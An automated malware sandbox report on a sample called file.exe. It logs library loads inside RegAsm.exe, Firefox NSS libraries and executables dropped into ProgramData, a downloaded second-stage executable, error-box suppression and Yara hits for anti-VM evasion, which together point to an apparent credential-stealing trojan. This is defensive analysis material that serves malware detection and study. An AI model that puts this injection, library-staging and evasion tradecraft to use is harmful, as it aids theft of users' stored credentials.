Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2467582948.000000006F8FD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr
Source:	Binary string: c:\rje\tg\nti7\obj\Release\Fcs.pdb source: file.exe
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000003.00000002.2451866371.000000003AD53000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000003.00000002.2446517485.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
Source:	Binary string: c:\rje\tg\nti7\obj\Release\Fcs.pdb0; source: file.exe
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2467582948.000000006F8FD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2440185100.0000000022AB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2434694305.000000001CB4D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: c:\rje\tg\v\obj\Release\Fcs.pdb0 source: BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr
Source:	Binary string: c:\rje\tg\v\obj\Release\Fcs.pdb source: BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041891A GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_0041891A

Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042F112 push ecx; ret	3_2_0042F125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00422D09 push esi; ret	3_2_00422D0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DD85 push ecx; ret	3_2_0041DD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00432715 push 0000004Ch; iretd	3_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00440905 push ecx; retf	10_2_00440906

Source: file.exe	Static PE information: section name: .text entropy: 7.997020306823565
Source: BKKKEGIDBG.exe.3.dr	Static PE information: section name: .text entropy: 7.996402279659531
Source: 66eef0ca0fb35_lfdsa[1].exe.3.dr	Static PE information: section name: .text entropy: 7.996402279659531

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66eef0ca0fb35_lfdsa[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\BKKKEGIDBG.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\BKKKEGIDBG.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_0041891A

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.file.exe.35b5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.35b5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
